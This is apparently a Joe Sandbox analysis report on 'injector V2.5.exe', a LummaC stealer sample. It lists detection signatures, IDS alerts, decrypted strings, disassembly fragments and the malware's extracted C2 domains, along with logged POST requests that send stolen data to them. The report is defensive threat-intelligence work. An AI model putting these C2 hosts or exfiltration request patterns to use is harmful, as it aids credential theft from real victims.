Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
injector V2.5.exe

Overview

General Information

Sample name:injector V2.5.exe
Analysis ID:1561472
MD5:bcc3a5ac8ca364b58e08a8e771992d6a
SHA1:36f9ad6f96a2112c5ce71dba2cd87b04f33e6e6a
SHA256:fd0068122528a6a7042dd6301a77067e9675acbddce740e5e85e840d54f98243
Tags:exeuser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • injector V2.5.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\injector V2.5.exe" MD5: BCC3A5AC8CA364B58E08A8E771992D6A)
    • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • injector V2.5.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\injector V2.5.exe" MD5: BCC3A5AC8CA364B58E08A8E771992D6A)
  • cleanup
{"C2 url": ["revirepart.biz"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: injector V2.5.exe PID: 6276JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: injector V2.5.exe PID: 6276JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:17:31.428348+010020283713Unknown Traffic192.168.2.449730104.21.43.198443TCP
          2024-11-23T14:17:33.785867+010020283713Unknown Traffic192.168.2.449731104.21.88.250443TCP
          2024-11-23T14:17:35.837311+010020283713Unknown Traffic192.168.2.449732104.21.88.250443TCP
          2024-11-23T14:17:38.055093+010020283713Unknown Traffic192.168.2.449733104.21.88.250443TCP
          2024-11-23T14:17:40.586974+010020283713Unknown Traffic192.168.2.449734104.21.88.250443TCP
          2024-11-23T14:17:43.448049+010020283713Unknown Traffic192.168.2.449735104.21.88.250443TCP
          2024-11-23T14:17:45.914671+010020283713Unknown Traffic192.168.2.449736104.21.88.250443TCP
          2024-11-23T14:17:48.020961+010020283713Unknown Traffic192.168.2.449738104.21.88.250443TCP
          2024-11-23T14:17:50.790073+010020283713Unknown Traffic192.168.2.449742104.21.88.250443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:17:32.104063+010020546531A Network Trojan was detected192.168.2.449730104.21.43.198443TCP
          2024-11-23T14:17:34.517725+010020546531A Network Trojan was detected192.168.2.449731104.21.88.250443TCP
          2024-11-23T14:17:36.543606+010020546531A Network Trojan was detected192.168.2.449732104.21.88.250443TCP
          2024-11-23T14:17:51.493354+010020546531A Network Trojan was detected192.168.2.449742104.21.88.250443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:17:32.104063+010020498361A Network Trojan was detected192.168.2.449730104.21.43.198443TCP
          2024-11-23T14:17:34.517725+010020498361A Network Trojan was detected192.168.2.449731104.21.88.250443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:17:36.543606+010020498121A Network Trojan was detected192.168.2.449732104.21.88.250443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:17:31.428348+010020576471Domain Observed Used for C2 Detected192.168.2.449730104.21.43.198443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:17:29.663824+010020576461Domain Observed Used for C2 Detected192.168.2.4617061.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-23T14:17:49.421766+010020480941Malware Command and Control Activity Detected192.168.2.449738104.21.88.250443TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000000.00000002.1716566953.0000000002B0E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["revirepart.biz"]}
          Source: injector V2.5.exeReversingLabs: Detection: 39%
          Source: injector V2.5.exeJoe Sandbox ML: detected
          Source: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: revirepart.biz
          Source: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
          Source: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
          Source: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
          Source: 00000002.00000002.1939914379.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_0041A4DA CryptUnprotectData,2_2_0041A4DA
          Source: injector V2.5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.43.198:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49732 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49733 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49734 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49735 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: injector V2.5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_0060C7DB FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0060C7DB
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-4E0E29DCh]2_2_004190D0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]2_2_0040B97E
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov edi, eax2_2_00409AE0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+74h]2_2_00409AE0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov byte ptr [edi], dl2_2_0040DA8D
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h2_2_00442B00
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov byte ptr [edx], al2_2_0042F3ED
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+0000009Ch]2_2_0042E398
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov byte ptr [edx], cl2_2_0042EB98
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+74h]2_2_0040AD50
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+28421CC0h]2_2_00442530
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ebx, esi2_2_0040C5BE
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5B126FE8h2_2_004427D0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h2_2_0042D040
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov dl, EAh2_2_00441860
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ecx, eax2_2_0042E06F
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+30h]2_2_00407870
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then add eax, dword ptr [esp+edx*4+30h]2_2_00407870
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ebx, eax2_2_00402820
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov byte ptr [eax], dl2_2_0042D830
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ecx, eax2_2_0042E039
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx ebx, byte ptr [esp+esi-3E780BCDh]2_2_0042A0D5
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ecx, eax2_2_0042E007
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]2_2_0042B0FA
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]2_2_0040F096
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+00000148h]2_2_0040F096
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov edi, esi2_2_004068B0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], A2545BF7h2_2_00442970
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov dl, EAh2_2_00441930
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_004379E0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edi, byte ptr [esp+ebx+1Ch]2_2_0040E1EC
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov word ptr [edx], di2_2_0041FF7F
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h2_2_00425190
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041DA40
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp dword ptr [ecx+esi*8], 4F699CD4h2_2_00443260
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov di, 0008h2_2_00404A31
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edx, byte ptr [eax]2_2_0043DAC0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+30h]2_2_0041E2F0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_0041E2F0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042CAB0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx]2_2_0042B340
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_0041EFF5
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h2_2_0041EFF5
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then push ebx2_2_0040C303
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ecx, eax2_2_0041BB10
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h2_2_0041FB20
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov word ptr [ecx], dx2_2_0041FB20
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ecx, eax2_2_00426BD0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]2_2_00426BD0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, word ptr [edi]2_2_00426BD0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov edx, ecx2_2_00426BD0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_0042D4A0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+2C0C617Eh]2_2_0041DD48
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax+00000404h]2_2_0042FD65
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov edi, eax2_2_0042FD65
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov edx, ecx2_2_00426510
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov esi, ecx2_2_00429520
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0040CE52
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [ebx+ecx-18254539h]2_2_0040CE52
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ecx, eax2_2_00426E00
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]2_2_00426E00
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, word ptr [edi]2_2_00426E00
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov edx, ecx2_2_00426E00
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov byte ptr [ecx], dl2_2_0042DE10
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov eax, edi2_2_0041F6E0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ebx, ecx2_2_0041F6E0
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-6032535Eh]2_2_004296F4
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov ecx, eax2_2_00426F70
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000880h]2_2_00426F70
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx esi, word ptr [edi]2_2_00426F70
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov edx, ecx2_2_00426F70
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov word ptr [edx], di2_2_0041FF7F
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then lea ecx, dword ptr [esp+00000A28h]2_2_0040E714
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov edx, ecx2_2_0041C7C9
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 1B6183F2h2_2_0040E7D9
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then mov word ptr [ebx], cx2_2_0041EFF5
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then cmp word ptr [ebp+eax+02h], 0000h2_2_0041EFF5
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+0000009Ch]2_2_0042EF87
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-000000D3h]2_2_0041BFB6

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2057646 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz) : 192.168.2.4:61706 -> 1.1.1.1:53
          Source: Network trafficSuricata IDS: 2057647 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI) : 192.168.2.4:49730 -> 104.21.43.198:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.43.198:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.43.198:443
          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49738 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 104.21.88.250:443
          Source: Malware configuration extractorURLs: revirepart.biz
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.43.198:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.88.250:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.88.250:443
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WMPPQDEMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18110Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GQRL7OYO3CXCHC5RQ4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L77GLR83TIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20396Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HDOQ1XHNTVIKDHFRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1261Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7TCT4MM8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1074Host: frogs-severz.sbs
          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: frogs-severz.sbs
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: revirepart.biz
          Source: global trafficDNS traffic detected: DNS query: frogs-severz.sbs
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: injector V2.5.exe, 00000002.00000003.1839307754.0000000005428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: injector V2.5.exe, 00000002.00000003.1788023368.000000000541A000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1787951787.000000000541C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: injector V2.5.exe, 00000002.00000003.1939838274.00000000053DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/
          Source: injector V2.5.exe, 00000002.00000003.1863121105.00000000053DD000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1862335417.00000000053DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/7P
